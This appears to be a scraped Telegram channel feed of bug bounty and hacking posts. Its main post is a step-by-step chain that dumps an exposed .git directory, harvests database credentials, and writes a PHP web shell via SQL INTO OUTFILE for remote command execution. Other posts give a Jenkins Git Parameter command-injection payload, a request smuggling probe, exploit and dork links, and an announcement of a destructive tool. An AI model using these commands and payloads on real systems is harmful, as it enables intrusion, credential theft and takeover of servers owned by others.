Brut Security
14.7K subscribers
910 photos
73 videos
287 files
967 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
Hey Hunter's,
DarkShadow here  back again, dropping one of my secret methodologies that turns a full Remote Code Execution!


๐Ÿ’ฅ From /.git to FULL RCE โ€“ The Ultimate Git-Based Exploitation Chain๐Ÿ”ฅ

๐ŸŽฏ Target: Exposed .git/ Directory

You found a target where /.git/ is publicly accessible?
Think it's just a low-hanging fruit misconfiguration?
Think again โ€” weโ€™re about to break that into Critical RCE ๐Ÿ”ฅ

๐Ÿ” Tip: Use Chrome extensions like DotGit, GitHound, or your any favorite fuzzing tools.

โš™๏ธ Step-by-Step Exploitation
Step 1: Dump the Git Repo


Use GitDumper from GitTools:

git clone https://github.com/internetwache/GitTools
cd GitTools/Dumper
bash gitdumper.sh https://target.com/.git/ webCode
๐Ÿ‘‰ This tool will recursively download the entire .git repository into /webCode

Step 2: Reconstruct the Source Code

cd webCode
git checkout .


โœ… This restores all files from the latest commit, giving you full access to the source code.

Step 3: Explore Git History for Secrets

git log -p


Look for hardcoded credentials, tokens, DB configs, etc.

๐Ÿ“Œ Realistic Example:

commit 3b95f2c798a12427a1234b6d1234567890abcdef
Author: dev_admin <[email protected]>
Date:   Thu Jul 11 17:32:15 2024 +0000

    Added database config

diff --git a/config.php b/config.php
new file mode 100644
+++ b/config.php
@@ -0,0 +1,6 @@
+<?php
+$db_host = "258.20.78.55";
+$db_user = "root";
+$db_pass = "master_!pass2020";
+$db_name = "production";
+?>


Weโ€™ve got database password!

Step 4: Connect to the Database

mysql -h 258.20.78.55 -u root -p'master_!pass2020'

Step 5: Escalate to RCE via SQL

Check your privileges:

SHOW GRANTS FOR CURRENT_USER;


โœ… If You Have FILE Privilege:

Write a web shell to the web root:

SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';

Then browse:
https://target.com/shell.php?cmd=id


Boom ๐Ÿ’ฅ โ€” Remote Code Execution on the box!

If you enjoyed this methodology and want more exploitation chains, PoCs, and red team tips, make sure to follow me on X ๐Ÿ‘‰๐Ÿผ x.com/darkshadow2bd

#bugbountytips
๐Ÿ”ฅ20โค11๐Ÿซก5๐Ÿ‘1
Is there Anyone from uwo.ca
western University
๐Ÿ—ฟ14๐Ÿ”ฅ2โค1
โšก COMMIX - Automated All-in-One OS Command Injection Exploitation Tool.

โœ…
https://github.com/commixproject/commix

#bugbountytips #bugbounty
๐Ÿ”ฅ10โค6
๐Ÿ˜‚๐Ÿคฃ
๐Ÿ˜59๐Ÿ—ฟ12๐Ÿ”ฅ3๐Ÿ˜ข3โค2๐Ÿ˜ฑ1
Need to quickly check for exposed backup files? Check out fuzzuli, a simple tool by @musana to quickly check for sensitive files! ๐Ÿค 

๐Ÿ”— github.com/musana/fuzzuli
โค8๐Ÿ”ฅ3
Hey Hunter's,
DarkShadow here back again, just dropping a critical RCE...

๐Ÿ”ฅJenkins Git Parameter Plugin โ€“ Command Injection๐Ÿ’€

The Jenkins plugin โ€œGit Parameterโ€ (versions up to 439.vb_0e46ca_14534) allows attackers to inject arbitrary Git parameter values into shell commands.

Approximately 15,000 publicly accessible Jenkins servers have authentication disabled! And some others allow anyone to create accounts freely.

POC payload:
set parameter type: branch
Input the Payload in, set default value: $(sleep 80)


insert here $(YOUR OS COMMANDS)

So guy's if you like to more read latest POC's show your love's and share.
~DarkShadow

#bugbountytips #poc #Infosec #rce
โค16๐Ÿ‘3๐Ÿ‘2
Notes from "How to Crush Bug Bounties in the first 12 Months" by @hakluke
๐Ÿ”ฅ16๐Ÿ‘จโ€๐Ÿ’ป1๐Ÿ—ฟ1
Guy's finally i made Linuxbomber.

A tool that exploit Linux environment and able to damage permanently any Linux OS even some case's it exploit hardware.

Let me know can i upload the tool in my GitHub?

Made just for educational purpose only
๐Ÿ”ฅ21๐Ÿ˜ฑ5๐Ÿ™4โค2๐Ÿ˜2๐Ÿค”1
One of my student in very 1st day of the Advanced Web Pentesing session, just performed a basic automation scan and got sensitive information disclosure.

โœ…If you want to enroll and learn from very beginner level then DM us on https://wa.link/brutsecurity
๐Ÿ‘4
๐Ÿšจ CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability

๐Ÿ”ฅPoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis

๐Ÿ‘‡Dorks
HUNTER : https://product.name="Jenkins"

๐Ÿ“ฐRefer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419

https://github.com/advisories/GHSA-qcj2-99cg-mppf
โค8
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! ๐Ÿ˜Ž

Check it out! ๐Ÿ‘‡
๐Ÿ”—
https://github.com/kevin-mizu/domloggerpp
๐Ÿ”ฅ7๐Ÿ‘1
This media is not supported in your browser
VIEW IN TELEGRAM
How to manually check for CL.TE Request Smuggling Vulnerabilities:

1๏ธโƒฃ See if a GET request accepts POST
2๏ธโƒฃ See if it accepts HTTP/1
3๏ธโƒฃ Disable "Update Content-Length"
4๏ธโƒฃ Send with CL & TE headers:
POST / HTTP/1.1
Host: <HOST-URL>
Content-Length: 6
Transfer-Encoding: chunked

0

G

5๏ธโƒฃ Send request twice.

If you receive a response like "Unrecognized method GPOST", you've just confirmed a CL.TE vulnerability!

Try this out for yourself in our CL.TE lab:
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
๐Ÿ‘19โค8๐Ÿ‘3๐Ÿณ1
CVE-2025-7384: Critical PHP Object Injection in WordPress Plugin

A critical vulnerability has been found in the Database for Contact Form 7, WPForms, and Elementor forms WordPress plugin. Since this is a backend-only plugin, it is not directly detectable through standard search dorks. Supported frontend plugins could help determine the scope. However, only about 1% of hosts identified this way are actually vulnerable.

๐Ÿ” Netlas: https://nt.ls/Be3g6
โ„น๏ธ Advisory: https://nt.ls/RoI8t
๐Ÿ˜5
Brut Security pinned Deleted message
๐Ÿ”ฅ Exclusive ZoomEye Offer for Brut Security Members

โœ…ZoomEye is giving Brut Security members 5% off any membership plan โ€” monthly or yearly โ€” through our special link.

๐Ÿ“Œ How it works:

โœฆ Click our link:
https://www.zoomeye.ai/pricing?aff=INVITE-2SW2-FC96
โœฆ Get instant 5% discount on your purchase

๐Ÿ’ก Perfect for bug bounty hunters, pentesters, and researchers who rely on fast, deep internet asset scanning.

#bugbounty #pentesting #osint #cybersecurity #tools
๐Ÿ”ฅ3โค1
Brut Security pinned ยซ๐Ÿ”ฅ Exclusive ZoomEye Offer for Brut Security Members โœ…ZoomEye is giving Brut Security members 5% off any membership plan โ€” monthly or yearly โ€” through our special link. ๐Ÿ“Œ How it works: โœฆ Click our link: https://www.zoomeye.ai/pricing?aff=INVITE-2SW2-FC96โ€ฆยป
๐ŸŽ‰ Happy Independence Day, India! ๐Ÿ‡ฎ๐Ÿ‡ณ

Today we celebrate freedom, unity, and the courage to protect what matters.
To all our friends across the globe โ€” hereโ€™s to peace, respect, and security for every nation. ๐ŸŒ๐Ÿ’ป

Love from the Brut Security family to yours. โค๏ธ
โค21